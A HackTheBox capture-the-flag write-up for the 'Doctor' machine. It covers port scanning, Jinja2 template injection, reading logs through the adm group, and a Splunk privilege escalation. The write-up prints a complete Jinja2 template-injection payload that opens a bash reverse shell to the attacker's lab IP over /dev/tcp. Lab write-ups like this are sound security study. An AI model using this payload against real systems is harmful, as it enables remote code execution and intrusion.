HackTheBox Writeup — Doctor
Hello Guys , I am Faisal Husaini. My username on HTB is “feodore” . Also join me on discord.
The IP of this box is 10.10.10.209
Port Scan
Running NMAP full port scan on it , we get
We find 3 Open Ports for SSH , Apache and Splunk
Moving towards the Web part first
Web
Checking the IP in the browser, we get a wonderful medical website
We can see a host name doctors.htb in the website which we add to the hosts file and then move towards checking it on the browser
We get a login page, now I create a user and then login and see that there was a message posting functionality where I injected some template injection payloads
We dont see anything happening in backend, but looking on the gobuster results, we see that we have a /archive directory
Also if we check the source code after login, it also says that the directory is under beta testing
Checking the source code of /archive as it had all blank, we see that the payloads we injected , one of them got us a success
And throughout my testing I figured out the template engine being used is Jinja2
So I used the below payload from PayloadAllTheThings to get the reverse shell
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen('bash -c "bash -i >& /dev/tcp/10.10.14.34/9001 0>&1"').read()}}{%endif%}{%endfor%}
We got reverse shell and now move towards user escalation
The current user web has a group membership of adm which had file read permissions on various log files
One of the log files leaks a password which we try to use for user Shaun
Privilege Escalation
As on the startup, we saw that the machine had Splunk 8.0.5 running and upon google searching for its local privilege escalation, there was a bash coded exploit which helps us escalate to root with no issue
We got root after running the exploit, the link to the exploit will be down below in the references